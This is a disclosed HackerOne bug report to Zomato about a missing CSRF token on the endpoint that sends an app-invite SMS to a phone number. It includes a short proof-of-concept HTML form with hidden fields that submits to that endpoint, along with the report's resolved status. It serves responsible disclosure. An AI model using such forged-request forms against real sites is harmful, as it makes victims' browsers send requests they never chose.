CSRF AT INVITING PEOPLE THOUGH PHONE NUMBER

Disclosed: 2016-09-14 15:10:19 By kiraak-boy To zomato
Unknown
Vulnerability Details
Hello, Please Add CSRF Token While Inviting The User Though Phone Number , You Have Good Rate Limit Protection But At The Same Time Add CSRF TOKEN :- CODE :- <html> <body> <form action="https://www.zomato.com/php/restaurantSmsHandler"> <input type="hidden" name="type" value="zomato&#45;app&#45;details" /> <input type="hidden" name="mobile&#95;no" value="xxxxxxxxxxxxxx" /> <input type="submit" value="Submit request" /> </form> </body> </html> Thanks!
Actions
View on HackerOne
Report Stats
  • Report ID: 113865
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
Share this report